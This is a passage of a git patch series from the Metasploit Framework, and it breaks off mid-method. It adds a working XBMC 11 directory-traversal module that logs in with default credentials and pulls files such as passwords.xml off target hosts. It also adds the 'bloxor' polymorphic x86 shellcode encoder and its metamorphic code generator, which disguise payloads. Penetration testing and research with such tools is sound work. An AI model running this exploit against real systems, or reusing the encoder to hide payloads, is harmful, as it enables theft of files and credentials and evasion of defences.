From dac331fa10d30d709cb1cd4201db35fe42b86118 Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Sat, 3 Nov 2012 22:19:48 -0400 Subject: [PATCH 001/139] Added XBMC Traversal exploit --- .../auxiliary/scanner/http/xbmc_traversal.rb | 86 +++++++++++++++++++ 1 file changed, 86 insertions(+) create mode 100644 modules/auxiliary/scanner/http/xbmc_traversal.rb diff --git a/modules/auxiliary/scanner/http/xbmc_traversal.rb b/modules/auxiliary/scanner/http/xbmc_traversal.rb new file mode 100644 index 0000000000..11f48abaac --- /dev/null +++ b/modules/auxiliary/scanner/http/xbmc_traversal.rb @@ -0,0 +1,86 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "XBMC Web Server Directory Traversal", + 'Description' => %q{ + This module exploits a directory traversal bug in XBMC 11. + The module can only be used to retrieve files. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'sinn3r', # Used sinn3r's yaws_traversal exploit as a skeleton + 'Lucas "acidgen" Lundgren IOActive', + 'Matt "hostess" Andreko', + ], + 'References' => + [ + ['URL', 'http://forum.xbmc.org/showthread.php?tid=144110&pid=1227348'] + ], + 'DisclosureDate' => "Nov 1 2012" + )) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('FILEPATH', [false, 'The name of the file to download', '/private/var/mobile/Library/Preferences/XBMC/userdata/passwords.xml']), + OptString.new('USER', [true, 'The username to use for the HTTP server', 'xbmc']), + OptString.new('PASS', [true, 'The password to use for the HTTP server', 'xbmc']), + ], self.class) + + deregister_options('RHOST') + end + + def run_host(ip) + # No point to continue if no filename is specified + if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty? + print_error("Please supply the name of the file you want to download") + return + end + + # Create request + traversal = "../../../../../../../../.." + res = send_request_raw({ + 'method' => 'GET', + 'uri' => "/#{traversal}/#{datastore['FILEPATH']}", + 'basic_auth' => "#{datastore['USER']}:#{datastore['PASS']}" + }, 25) + + # Show data if needed + if res + if res.code == 200 + vprint_line(res.to_s) + fname = File.basename(datastore['FILEPATH']) + + path = store_loot( + 'xbmc.http', + 'application/octet-stream', + ip, + res.body, + fname + ) + print_good("File saved in: #{path}") + elsif res.code == 401 + print_error("#{rhost}:#{rport} Authentication failed") + elsif res.code == 404 + print_error("#{rhost}:#{rport} File not found") + end + else + print_error("HTTP Response failed") + end + end +end From 6843aa3a6c1b34d9674576ae554b475decbb54b3 Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Thu, 8 Nov 2012 10:09:28 -0500 Subject: [PATCH 002/139] Added fix URL and a few more comments. Corrected date. --- modules/auxiliary/scanner/http/xbmc_traversal.rb | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/scanner/http/xbmc_traversal.rb b/modules/auxiliary/scanner/http/xbmc_traversal.rb index 11f48abaac..2828421109 100644 --- a/modules/auxiliary/scanner/http/xbmc_traversal.rb +++ b/modules/auxiliary/scanner/http/xbmc_traversal.rb @@ -17,21 +17,22 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => "XBMC Web Server Directory Traversal", 'Description' => %q{ - This module exploits a directory traversal bug in XBMC 11. + This module exploits a directory traversal bug in XBMC 11, up until the 2012-11-04 nightly build. The module can only be used to retrieve files. }, 'License' => MSF_LICENSE, 'Author' => [ - 'sinn3r', # Used sinn3r's yaws_traversal exploit as a skeleton + 'sinn3r', # Used sinn3r's yaws_traversal exploit as a skeleton 'Lucas "acidgen" Lundgren IOActive', 'Matt "hostess" Andreko', ], 'References' => [ - ['URL', 'http://forum.xbmc.org/showthread.php?tid=144110&pid=1227348'] + ['URL', 'http://forum.xbmc.org/showthread.php?tid=144110&pid=1227348'], + ['URL', 'https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335'], ], - 'DisclosureDate' => "Nov 1 2012" + 'DisclosureDate' => "Nov 4 2012" )) register_options( @@ -53,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary end # Create request - traversal = "../../../../../../../../.." + traversal = "../../../../../../../../.." #The longest of all platforms tested was 9 deep res = send_request_raw({ 'method' => 'GET', 'uri' => "/#{traversal}/#{datastore['FILEPATH']}", @@ -75,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary ) print_good("File saved in: #{path}") elsif res.code == 401 - print_error("#{rhost}:#{rport} Authentication failed") + print_error("#{rhost}:#{rport} Authentication failed") elsif res.code == 404 print_error("#{rhost}:#{rport} File not found") end From 8e6e1bc16408ac51db418c8976bf8defed40d420 Mon Sep 17 00:00:00 2001 From: Stephen Fewer Date: Thu, 10 Jan 2013 17:39:40 +0000 Subject: [PATCH 003/139] open up the bloxor encoder. --- lib/rex/arch/x86.rb | 19 +- lib/rex/encoder/bloxor/bloxor.rb | 326 ++++++++++++ lib/rex/poly.rb | 1 + lib/rex/poly/machine.rb | 12 + lib/rex/poly/machine/machine.rb | 829 +++++++++++++++++++++++++++++++ lib/rex/poly/machine/x86.rb | 508 +++++++++++++++++++ modules/encoders/x86/bloxor.rb | 58 +++ test/tests/test_encoders.rb | 119 +++++ 8 files changed, 1868 insertions(+), 4 deletions(-) create mode 100644 lib/rex/encoder/bloxor/bloxor.rb create mode 100644 lib/rex/poly/machine.rb create mode 100644 lib/rex/poly/machine/machine.rb create mode 100644 lib/rex/poly/machine/x86.rb create mode 100644 modules/encoders/x86/bloxor.rb create mode 100644 test/tests/test_encoders.rb diff --git a/lib/rex/arch/x86.rb b/lib/rex/arch/x86.rb index 16671ca21f..64b7d52302 100644 --- a/lib/rex/arch/x86.rb +++ b/lib/rex/arch/x86.rb @@ -22,16 +22,27 @@ module X86 ESI = DH = SI = 6 EDI = BH = DI = 7 - REG_NAMES32 = [ 'eax', 'ecx', 'edx', 'ebx', - 'esp', 'ebp', 'esi', 'edi' ] # :nodoc: - + REG_NAMES32 = [ 'eax', 'ecx', 'edx', 'ebx', 'esp', 'ebp', 'esi', 'edi' ] + + REG_NAMES16 = [ 'ax', 'cx', 'dx', 'bx', 'sp', 'bp', 'si', 'di' ] + + REG_NAMES8L = [ 'al', 'cl', 'dl', 'bl', nil, nil, nil, nil ] + # Jump tp a specific register def self.jmp_reg(str) reg = reg_number(str) _check_reg(reg) "\xFF" + [224 + reg].pack('C') end - + + # + # Generate a LOOP instruction (Decrement ECX and jump short if ECX == 0) + # + def self.loop(offset) + "\xE2" + pack_lsb(rel_number(offset, -2)) + end + + # # This method returns the opcodes that compose a jump instruction to the # supplied relative offset. def self.jmp(addr) diff --git a/lib/rex/encoder/bloxor/bloxor.rb b/lib/rex/encoder/bloxor/bloxor.rb new file mode 100644 index 0000000000..b7684a32d1 --- /dev/null +++ b/lib/rex/encoder/bloxor/bloxor.rb @@ -0,0 +1,326 @@ + +require 'rex/poly/machine' + +module Rex + +module Encoder + + class BloXor < Msf::Encoder + + def initialize( *args ) + super + @machine = nil + @blocks_out = [] + @block_size = 0 + end + + # + # + # + def decoder_stub( state ) + + if( not state.decoder_stub ) + @blocks_out = [] + @block_size = 0 + + # XXX: It would be ideal to use a random block size but unless we know the maximum size our final encoded + # blob can be we should instead start with the smallest block size and go up to avoid generating + # anything too big (if we knew the max size we could try something smaller if we generated a blob too big) + #block_sizes = (1..state.buf.length).to_a.shuffle + #block_sizes.each do | len | + + 1.upto( state.buf.length ) do | len | + + # For now we ignore all odd sizes to help with performance (The rex poly machine + # doesnt have many load/store primitives that can handle byte sizes efficiently) + if( len % 2 != 0 ) + next + end + + blocks, size = compute_encoded( state, len ) + if( blocks and size ) + + # We sanity check that the newly generated block ammount and the block size + # are not in the badchar list when converted into a hex form. Helps speed + # things up a great deal when generating a decoder stub later as these + # values may be used throughout. + + if( not number_is_valid?( state, blocks.length - 1 ) or not number_is_valid?( state, ~( blocks.length - 1 ) ) ) + next + end + + if( not number_is_valid?( state, size ) or not number_is_valid?( state, ~size ) ) + next + end + + @blocks_out = blocks + @block_size = size + + break + end + end + + raise RuntimeError, "Unable to generate seed block." if( @blocks_out.empty? ) + + state.decoder_stub = compute_decoder( state ) + end + + state.decoder_stub + end + + # + # + # + def encode_block( state, data ) + + buffer = '' + + @blocks_out.each do | block | + buffer << block.pack( 'C*' ) + end + + buffer + end + + protected + + # + # Is a number in its byte form valid against the badchars? + # + def number_is_valid?( state, number ) + size = 'C' + if( number > 0xFFFF ) + size = 'V' + elsif( number > 0xFF ) + size = 'v' + end + return Rex::Text.badchar_index( [ number ].pack( size ), state.badchars ).nil? + end + + # + # Calculate Shannon's entropy. + # + def entropy( data ) + entropy = 0.to_f + (0..255).each do | byte | + freq = data.to_s.count( byte.chr ).to_f / data.to_s.length + if( freq > 0 ) + entropy -= freq * Math.log2( freq ) + end + end + return entropy / 8 + end + + # + # Compute the encoded blocks (and associated seed) + # + def compute_encoded( state, len ) + + blocks_in = ::Array.new + + input = '' << state.buf + + block_padding = ( input.length % len ) > 0 ? len - ( input.length % len ) : 0 + + if( block_padding > 0 ) + 0.upto( block_padding-1 ) do + input << [ rand( 255 ) ].pack( 'C' ) + end + end + + while( input.length > 0 ) + blocks_in << input[0..len-1].unpack( 'C*' ) + input = input[len..input.length] + end + + seed = compute_seed( blocks_in, len, block_padding, state.badchars.unpack( 'C*' ) ) + + if( not seed ) + return [ nil, nil ] + end + + blocks_out = [ seed ] + + blocks_in.each do | block | + blocks_out << compute_block( blocks_out.last, block ) + end + + return [ blocks_out, len ] + end + + # + # Generate the decoder stub which is functionally equivalent to the following: + # + # source = &end; + # dest = source + BLOCK_SIZE; + # counter = BLOCK_COUNT * ( BLOCK_SIZE / chunk_size ); + # do + # { + # encoded = *(CHUNK_SIZE *)dest; + # dest += chunk_size; + # decoded = *(CHUNK_SIZE *)source; + # *(CHUNK_SIZE *)source = decoded ^ encoded; + # source += chunk_size; + # } while( --counter ); + # + # end: + # + def compute_decoder( state ) + + @machine.create_variable( 'source' ) + @machine.create_variable( 'dest' ) + @machine.create_variable( 'counter' ) + @machine.create_variable( 'encoded' ) + @machine.create_variable( 'decoded' ) + + chunk_size = Rex::Poly::Machine::BYTE + if( @machine.native_size() == Rex::Poly::Machine::QWORD ) + if( @block_size % Rex::Poly::Machine::QWORD == 0 ) + chunk_size = Rex::Poly::Machine::QWORD + elsif( @block_size % Rex::Poly::Machine::DWORD == 0 ) + chunk_size = Rex::Poly::Machine::DWORD + elsif( @block_size % Rex::Poly::Machine::WORD == 0 ) + chunk_size = Rex::Poly::Machine::WORD + end + elsif( @machine.native_size() == Rex::Poly::Machine::DWORD ) + if( @block_size % Rex::Poly::Machine::DWORD == 0 ) + chunk_size = Rex::Poly::Machine::DWORD + elsif( @block_size % Rex::Poly::Machine::WORD == 0 ) + chunk_size = Rex::Poly::Machine::WORD + end + elsif( @machine.native_size() == Rex::Poly::Machine::WORD ) + if( @block_size % Rex::Poly::Machine::WORD == 0 ) + chunk_size = Rex::Poly::Machine::WORD + end + end + + # Block 1 - Set the source variable to the address of the start block + @machine.create_block_primitive( 'block1', 'set', 'source', 'location' ) + + # Block 2 - Set the source variable to the address of the 1st encoded block + @machine.create_block_primitive( 'block2', 'add', 'source', 'end' ) + + # Block 3 - Set the destingation variable to the value of the source variable + @machine.create_block_primitive( 'block3', 'set', 'dest', 'source' ) + + # Block 4 - Set the destingation variable to the address of the 2nd encoded block + @machine.create_block_primitive( 'block4', 'add', 'dest', @block_size ) + + # Block 5 - Sets the loop counter to the number of blocks to process + @machine.create_block_primitive( 'block5', 'set', 'counter', ( ( @block_size / chunk_size ) * (@blocks_out.length - 1) ) ) + + # Block 6 - Set the encoded variable to the byte pointed to by the dest variable + @machine.create_block_primitive( 'block6', 'load', 'encoded', 'dest', chunk_size ) + + # Block 7 - Increment the destination variable by one + @machine.create_block_primitive( 'block7', 'add', 'dest', chunk_size ) + + # Block 8 - Set the decoded variable to the byte pointed to by the source variable + @machine.create_block_primitive( 'block8', 'load', 'decoded', 'source', chunk_size ) + + # Block 9 - Xor the decoded variable with the encoded variable + @machine.create_block_primitive( 'block9', 'xor', 'decoded', 'encoded' ) + + # Block 10 - store the newly decoded byte + @machine.create_block_primitive( 'block10', 'store', 'source', 'decoded', chunk_size ) + + # Block 11 - Increment the source variable by one + @machine.create_block_primitive( 'block11', 'add', 'source', chunk_size ) + + # Block 12 - Jump back up to the outer_loop block while the counter variable > 0 + @machine.create_block_primitive( 'block12', 'loop', 'counter', 'block6' ) + + # Try to generate the decoder stub... + decoder = @machine.generate + + if( not decoder ) + raise RuntimeError, "Unable to generate decoder stub." + end + + decoder + end + + # + # Compute the seed block which will successfully decode all proceeding encoded + # blocks while ensuring the encoded blocks do not contain any badchars. + # + def compute_seed( blocks_in, block_size, block_padding, badchars ) + seed = [] + redo_bytes = [] + + 0.upto( block_size-1 ) do | index | + + seed_bytes = (0..255).sort_by do + rand() + end + + seed_bytes.each do | seed_byte | + + next if( badchars.include?( seed_byte ) ) + + success = true + + previous_byte = seed_byte + + if( redo_bytes.length < 256 ) + redo_bytes = (0..255).sort_by do + rand() + end + end + + blocks_in.each do | block | + + decoded_byte = block[ index ] + + encoded_byte = previous_byte ^ decoded_byte + + if( badchars.include?( encoded_byte ) ) + # the padding bytes we added earlier can be changed if they are causing us to fail. + if( block == blocks_in.last and index >= (block_size-block_padding) ) + if( redo_bytes.empty? ) + success = false + break + end + block[ index ] = redo_bytes.shift + redo + end + + success = false + break + end + + previous_byte = encoded_byte + end + + if( success ) + seed << seed_byte + break + end + end + + end + + if( seed.length == block_size ) + return seed + end + + return nil + end + + # + # Compute the next encoded block by xoring the previous + # encoded block with the next decoded block. + # + def compute_block( encoded, decoded ) + block = [] + 0.upto( encoded.length-1 ) do | index | + block << ( encoded[ index ] ^ decoded[ index ] ) + end + return block + end + + end + +end + +end \ No newline at end of file diff --git a/lib/rex/poly.rb b/lib/rex/poly.rb index 7e3ebc6db0..428695c168 100644 --- a/lib/rex/poly.rb +++ b/lib/rex/poly.rb @@ -4,6 +4,7 @@ module Poly require 'rex/poly/register' require 'rex/poly/block' +require 'rex/poly/machine' ### # diff --git a/lib/rex/poly/machine.rb b/lib/rex/poly/machine.rb new file mode 100644 index 0000000000..9e60195da1 --- /dev/null +++ b/lib/rex/poly/machine.rb @@ -0,0 +1,12 @@ + +module Rex + + module Poly + + require 'metasm' + require 'rex/poly/machine/machine' + require 'rex/poly/machine/x86' + + end + +end diff --git a/lib/rex/poly/machine/machine.rb b/lib/rex/poly/machine/machine.rb new file mode 100644 index 0000000000..6bac6a8b1f --- /dev/null +++ b/lib/rex/poly/machine/machine.rb @@ -0,0 +1,829 @@ + +module Rex + + module Poly + + # + # A machine capable of creating a small blob of code in a metamorphic kind of way. + # Note: this is designed to perform an exhaustive search for a solution and can be + # slow. If you need a speedier option, the origional Rex::Polly::Block stuff is a + # better choice. + # + class Machine + + QWORD = 8 + DWORD = 4 + WORD = 2 + BYTE = 1 + + # + # A Permutation! + # + class Permutation + + attr_accessor :active, :offset + + attr_reader :name, :primitive, :length, :args + + # + # Create a new permutation object. + # + def initialize( name, primitive, machine, source, args=nil ) + @name = name + @primitive = primitive + @machine = machine + @source = source + @args = args + @active = false + @valid = true + @length = 0 + @offset = 0 + @children = ::Array.new + end + + # + # Add in a child permutation to this one. Used to build the permutation tree. + # + def add_child( child ) + @children << child + end + + # + # Does this permutation have children? + # + def has_children? + not @children.empty? + end + + # + # Remove any existing children. Called by the machines generate function + # to build a fresh tree in case generate was previously called. + # + def remove_children + @children.clear + end + + # + # Actully render this permutation into a raw buffer. + # + def render + raw = '' + # Zero the length as we will be rendering the raw buffer and the length may change. + @length = 0 + # If this permutation source is a Primitive/Procedure we can call it, otherwise we have a string + if( @source.kind_of?( Primitive ) or @source.kind_of?( ::Proc ) ) + if( @source.kind_of?( Primitive ) ) + raw = @source.call( @name, @machine, *@args ) + elsif( @source.kind_of?( ::Proc ) ) + raw = @source.call + end + # If the primitive/procedure returned an array, it is an array of assembly strings which we can assemble. + if( raw.kind_of?( ::Array ) ) + lines = raw + raw = '' + # itterate over each line of assembly + lines.each do | asm | + # parse the asm and substitute in any offset values specified... + offsets = asm.scan( /:([\S]+)_offset/ ) + offsets.each do | name, | + asm = asm.gsub( ":#{name}_offset", @machine.block_offset( name ).to_s ) + end + # and substitute in and register values for any variables specified... + regs = asm.scan( /:([\S]+)_reg([\d]+)/ ) + regs.each do | name, size | + asm = asm.gsub( ":#{name}_reg#{size}", @machine.variable_value( name, size.to_i ) ) + end + # assemble it into a raw blob + blob = @machine.assemble( asm ) + #if( not @machine.is_valid?( blob ) ) + # p "#{name}(#{primitive}):#{asm} is invalid" + #end + raw << blob + end + end + else + # the source must just be a static string + raw = @source + end + # Update the length to reflect the new raw buffer + @length = raw.to_s.length + # As the temp variable is only assigned for the duration of a single permutation we + # can now release it if it was used in this permutation. + @machine.release_temp_variable + return raw.to_s + end + + # + # Test if this permutation raw buffer is valid in this machine (e.g. against the badchar list). + # + def is_valid? + result = false + if( @valid ) + begin + result = @machine.is_valid?( self.render ) + rescue UnallowedPermutation + # This permutation is unallowed and can never be rendered so just mark it as + # not valid to skip it during future attempts. + @valid = false + rescue UndefinedPermutation + # allow an undefined permutation to fail validation but keep it marked + # as valid as it may be defined and passed validation later. + ensure + # Should a temporary variable have been assigned we can release it here. + @machine.release_temp_variable + end + end + return result + end + + # + # Try to find a solution within the solution space by performing a depth first search + # into the permutation tree and backtracking when needed. + # + def solve + # Check to see if this permutation can make part of a valid solution + if( self.is_valid? ) + # record this permutation as part of the final solution (the current machines register state is also saved here) + @machine.solution_push( self ) + # If we have no children we are at the end of the tree and have a potential full solution. + if( not self.has_children? ) + # We have a solution but doing a final pass to update offsets may introduce bad chars + # so we test for this and keep searching if this isnt a real solution after all. + if( not @machine.solution_is_valid? ) + # remove this permutation and keep searching + @machine.solution_pop + return false + end + # Return true to unwind the recursive call as we have got a final solution. + return true + end + # Itterate over the children of this permutation (the perutations of the proceeding block). + @children.each do | child | + # Traverse into this child to keep trying to generate a solution... + if( child.solve ) + # Keep returning true to unwind as we are done. + return true + end + end + # If we get here this permutation, origionally thought to be good for a solution, is not after all, + # so remove it from the machines final solution, restoring the register state aswell. + @machine.solution_pop + end + # No children can be made form part of the solution, return failure for this path in the tree. + return false + end + + end + + # + # A symbolic permutation to mark locations like the begining and end of a group of blocks. + # Used to calculate usefull offsets. + # + class SymbolicPermutation < Permutation + def initialize( name, machine, initial_offset=0 ) + super( name, '', machine, '' ) + # fudge the initial symbolic offset with a default (it gets patched correctly later), + # helps with the end symbolic block to not be 0 (as its a forward reference it really + # slows things down if we leave it 0) + @offset = initial_offset + # A symbolic block is allways active! + @active = true + end + + # + # We block all attempts to set the active state of this permutation so as + # it is always true. This lets us always address the offset. + # + def active=( value ) + end + end + + # + # A primitive is a machine defined permutation which accepts some arguments when it is called. + # + class Primitive + + # + # Initialize this primitive with its target source procedure and the machine it belongs to. + # + def initialize( source ) + @source = source + end + + # + # Call the primitives source procedure, passing in the arguments. + # + def call( name, machine, *args ) + return @source.call( name, machine, *args ) + end + + end + + # + # + # + class Block + + #attr_accessor :next, :previous + attr_reader :name + + def initialize( name ) + @name = name + @next = nil + @previous = nil + @permutations = ::Array.new + end + + def shuffle + @permutations = @permutations.shuffle + end + + def solve + @permutations.first.solve + end + + def << ( permutation ) + @permutations << permutation + end + + def each + @permutations.each do | permutation | + yield permutation + end + end + + end + + # + # A class to hold a solution for a Rex::Poly::Machine problem. + # + class Solution + + attr_reader :offset + + def initialize + @permutations = ::Array.new + @reg_state = ::Array.new + @offset = 0 + end + + # + # Reset this solution to an empty state. + # + def reset + @offset = 0 + @permutations.each do | permutation | + permutation.active = false + permutation.offset = 0 + end + @permutations.clear + @reg_state.clear + end + + # + # Push a new permutation onto this solutions permutations list and save the associated register/variables state + # + def push( permutation, reg_available, reg_consumed, variables ) + permutation.active = true + permutation.offset = @offset + @offset += permutation.length + @permutations.push( permutation ) + @reg_state.push( [ [].concat(reg_available), [].concat(reg_consumed), {}.merge(variables) ] ) + end + + # + # Pop off the last permutaion and register/variables state from this solution. + # + def pop + reg_available, reg_consumed, variables = @reg_state.pop + permutation = @permutations.pop + permutation.active = false + permutation.offset = 0 + @offset -= permutation.length + return permutation, reg_available, reg_consumed, variables + end + + # + # Render the final buffer. + # + def buffer + previous_offset = nil + count = 0 + # perform an N-pass fixup for offsets... + while( true ) do + # If we cant get the offsets fixed within a fixed ammount of tries we return + # nil to indicate failure and keep searching for a solution that will work. + if( count > 64 ) + return nil + end + # Reset the solution offset so as to update it for this pass + @offset = 0 + # perform a single pass to ensure we are using the correct offset values + @permutations.each do | permutation | + permutation.offset = @offset + # Note: calling render() can throw both UndefinedPermutation and UnallowedPermutation exceptions, + # however as we assume we only ever return the buffer once a final solution has been generated + # we should never have either of those exceptions thrown. + permutation.render + @offset += permutation.length + end + # If we have generated two consecutive passes which are the same length we can stop fixing up the offsets. + if( not previous_offset.nil? and @offset == previous_offset ) + break + end + count +=1 + previous_offset = @offset + end + # now a final pass to render the solution into the raw buffer + raw = '' + @permutations.each do | permutation | + #$stderr.puts "#{permutation.name} - #{ "0x%08X (%d)" % [ permutation.offset, permutation.length] } " + raw << permutation.render + end + return raw + end + + end + + # + # Create a new machine instance. + # + def initialize( badchars, cpu ) + @badchars = badchars + @cpu = cpu + + @reg_available = ::Array.new + @reg_consumed = ::Array.new + @variables = ::Hash.new + @blocks = ::Hash.new + @primitives = ::Hash.new + @solution = Solution.new + + _create_primitives + + @blocks['begin'] = Block.new( 'begin' ) + @blocks['begin'] << SymbolicPermutation.new( 'begin', self ) + + _create_variable( 'temp' ) + end + + # + # Overloaded by a subclass to return the maximum native general register size supported. + # + def native_size + nil + end + + # + # Use METASM to assemble a line of asm using this machines current cpu. + # + def assemble( asm ) + return Metasm::Shellcode.assemble( @cpu, asm ).encode_string + end + + # + # Check if a data blob is valid against the badchar list (or perform any other validation here) + # + def is_valid?( data ) + if( data.nil? ) + return false + end + return Rex::Text.badchar_index( data, @badchars ).nil? + end + + # + # Generate a 64 bit number whoes bytes are valid in this machine. + # + def make_safe_qword( number=nil ) + return _make_safe_number( QWORD, number ) & 0xFFFFFFFFFFFFFFFF + end + + # + # Generate a 32 bit number whoes bytes are valid in this machine. + # + def make_safe_dword( number=nil ) + return _make_safe_number( DWORD, number ) & 0xFFFFFFFF + end + + # + # Generate a 16 bit number whoes bytes are valid in this machine. + # + def make_safe_word( number=nil ) + return _make_safe_number( WORD, number ) & 0xFFFF + end + + # + # Generate a 8 bit number whoes bytes are valid in this machine. + # + def make_safe_byte( number=nil ) + return _make_safe_number( BYTE, number ) & 0xFF + end + + # + # Create a variable by name which will be assigned a register during generation. We can + # optionally assign a static register value to a variable if needed. + # + def create_variable( name, reg=nil ) + # Sanity check we aren't trying to create one of the reserved variables. + if( name == 'temp' ) + raise RuntimeError, "Unable to create variable, '#{name}' is a reserved variable name." + end + return _create_variable( name, reg ) + end + + # + # If the temp variable was assigned we release it. + # + def release_temp_variable + if( @variables['temp'] ) + regnum = @variables['temp'] + # Sanity check the temp variable was actually assigned (it may not have been if the last permutation didnot use it) + if( regnum ) + # place the assigned register back in the available list for consumption later. + @reg_available.push( @reg_consumed.delete( regnum ) ) + # unasign the temp vars register + @variables['temp'] = nil + return true + end + end + return false + end + + # + # Resolve a variable name into its currently assigned register value. + # + def variable_value( name, size=nil ) + # Sanity check we this variable has been created + if( not @variables.has_key?( name ) ) + raise RuntimeError, "Unknown register '#{name}'." + end + # Pull out its current register value if it has been assigned one + regnum = @variables[ name ] + if( not regnum ) + regnum = @reg_available.pop + if( not regnum ) + raise RuntimeError, "Unable to assign variable '#{name}' a register value, none available." + end + # and add it to the consumed list so we can track it later + @reg_consumed << regnum + # and now assign the variable the register + @variables[ name ] = regnum + end + # resolve the register number int a string representation (e.g. 0 in x86 is EAX if size is 32) + return _register_value( regnum, size ) + end + + # + # Check this solution is still currently valid (as offsets change it may not be). + # + def solution_is_valid? + return self.is_valid?( @solution.buffer ) + end + + # + # As the solution advances we save state for each permutation step in the solution. This lets + # use rewind at a later stage if the solving algorithm wishes to perform some backtracking. + # + def solution_push( permutation ) + @solution.push( permutation, @reg_available, @reg_consumed, @variables ) + end + + # + # Backtrack one step in the solution and restore the register/variable state. + # + def solution_pop + permutation, @reg_available, @reg_consumed, @variables = @solution.pop + + @reg_available.push( @reg_available.shift ) + end + + # + # Create a block by name and add in its list of permutations. + # + # XXX: this doesnt support the fuzzy order of block dependencies ala the origional rex::poly + def create_block( name, *permutation_sources ) + # Sanity check we aren't trying to create one of the reserved symbolic blocks. + if( name == 'begin' or name == 'end' ) + raise RuntimeError, "Unable to add block, '#{name}' is a reserved block name." + end + # If this is the first time this block is being created, create the block object to hold the permutation list + if( not @blocks[name] ) + @blocks[name] = Block.new( name ) + end + # Now create a new permutation object for every one supplied. + permutation_sources.each do | source | + @blocks[name] << Permutation.new( name, '', self, source ) + end + return name + end + + # + # Create a block which is based on a primitive defined by this machine. + # + def create_block_primitive( block_name, primitive_name, *args ) + # Santiy check this primitive is actually available and is not an internal primitive (begins with an _). + if( not @primitives[primitive_name] or primitive_name[0] == "_" ) + raise RuntimeError, "Unable to add block, Primitive '#{primitive_name}' is not available." + end + # Sanity check we aren't trying to create one of the reserved symbolic blocks. + if( block_name == 'begin' or block_name == 'end' ) + raise RuntimeError, "Unable to add block, '#{block_name}' is a reserved block name." + end + return _create_block_primitive( block_name, primitive_name, *args ) + end + + # + # Get the offset for a blocks active permutation. This is easy for backward references as + # they will already have been rendered and their sizes known. For forward references we + # can't know in advance but the correct value can be known later once the final solution is + # available and a final pass to generate the raw buffer is made. + # + def block_offset( name ) + if( name == 'end' ) + return @solution.offset + elsif( @blocks[name] ) + @blocks[name].each do | permutation | + if( permutation.active ) + return permutation.offset + end + end + end + # If we are forward referencing a block it will be at least the current solutions offset +1 + return @solution.offset + 1 + end + + # + # Does a given block exist? + # + def block_exist?( name ) + return @blocks.include?( name ) + end + + # + # Does a given block exist? + # + def variable_exist?( name ) + return @variables.include?( name ) + end + + # XXX: ambiguity between variable names and block name may introduce confusion!!! make them be unique. + + # + # Resolve a given value into either a number literal, a block offset or + # a variables assigned register. + # + def resolve_value( value, size=nil ) + if( block_exist?( value ) ) + return block_offset( value ) + elsif( variable_exist?( value ) ) + return variable_value( value, size ) + end + return value.to_i + end + + # + # Get the block previous to the target block. + # + def block_previous( target_block ) + previous_block = nil + @blocks.each_key do | current_block | + if( current_block == target_block ) + return previous_block + end + previous_block = current_block + end + return nil + end + + # + # Get the block next to the target block. + # + def block_next( target_block ) + @blocks.each_key do | current_block | + if( block_previous( current_block ) == target_block ) + return current_block + end + end + return nil + end + + # + # Try to generate a solution. + # + def generate + + if( @blocks.has_key?( 'end' ) ) + @blocks.delete( 'end' ) + end + + @blocks['end'] = Block.new( 'end' ) + @blocks['end'] << SymbolicPermutation.new( 'end', self, 1 ) + + # Mix up the permutation orders for each block and create the tree structure. + previous = ::Array.new + @blocks.each_value do | block | + # Shuffle the order of the blocks permutations. + block.shuffle + # create the tree by adding the current blocks permutations as children of the previous block. + current = ::Array.new + block.each do | permutation | + permutation.remove_children + previous.each do | prev | + prev.add_child( permutation ) + end + current << permutation + end + previous = current + end + + # Shuffle the order of the available registers + @reg_available = @reg_available.shuffle + + # We must try every permutation of the register orders, so if we fail to + # generate a solution we rotate the available registers to try again with + # a different order. This ensures we perform and exhaustive search. + 0.upto( @reg_available.length - 1 ) do + + @solution.reset + + # Start from the root node in the solution space and generate a + # solution by traversing the solution space's tree structure. + if( @blocks['begin'].solve ) + # Return the solutions buffer (perform a last pass to fixup all offsets)... + return @solution.buffer + end + + @reg_available.push( @reg_available.shift ) + end + + # :( + nil + end + + # + # An UndefinedPermutation exception is raised when a permutation can't render yet + # as the conditions required are not yet satisfied. + # + class UndefinedPermutation < RuntimeError + def initialize( msg=nil ) + super + end + end + + # + # An UnallowedPermutation exception is raised when a permutation can't ever render + # as the conditions supplied are impossible to satisfy. + # + class UnallowedPermutation < RuntimeError + def initialize( msg=nil ) + super + end + end + + # + # An InvalidPermutation exception is raised when a permutation receives a invalid + # argument and cannot continue to render. This is a fatal exception. + # + class InvalidPermutation < RuntimeError + def initialize( msg=nil ) + super + end + end + + protected + + # + # Overloaded by a subclass to resolve a register number into a suitable register + # name for the target architecture. E.g on x64 the register number 0 with size 64 + # would resolve to RCX. Size is nil by default to indicate we want the default + # machine size, e.g. 32bit DWORD on x86 or 64bit QWORD on x64. + # + def _register_value( regnum, size=nil ) + nil + end + + # + # Perform the actual variable creation. + # + def _create_variable( name, reg=nil ) + regnum = nil + # Sanity check this variable has not already been created. + if( @variables[name] ) + raise RuntimeError, "Variable '#{name}' is already created." + end + # If a fixed register is being assigned to this variable then resolve it + if( reg ) + # Resolve the register name into a register number + @reg_available.each do | num | + if( _register_value( num ) == reg.downcase ) + regnum = num + break + end + end + # If an invalid register name was given or the chosen register is not available we must fail. + if( not regnum ) + raise RuntimeError, "Register '#{reg}' is unknown or unavailable." + end + # Sanity check another variable isnt assigned this register + if( @variables.has_value?( regnum ) ) + raise RuntimeError, "Register number '#{regnum}' is already consumed by variable '#{@variables[name]}'." + end + # Finally we consume the register chosen so we dont select it again later. + @reg_consumed << @reg_available.delete( regnum ) + end + # Create the variable and assign it a register number (or nil if not yet assigned) + @variables[name] = regnum + return name + end + + # + # Create a block which is based on a primitive defined by this machine. + # + def _create_block_primitive( block_name, 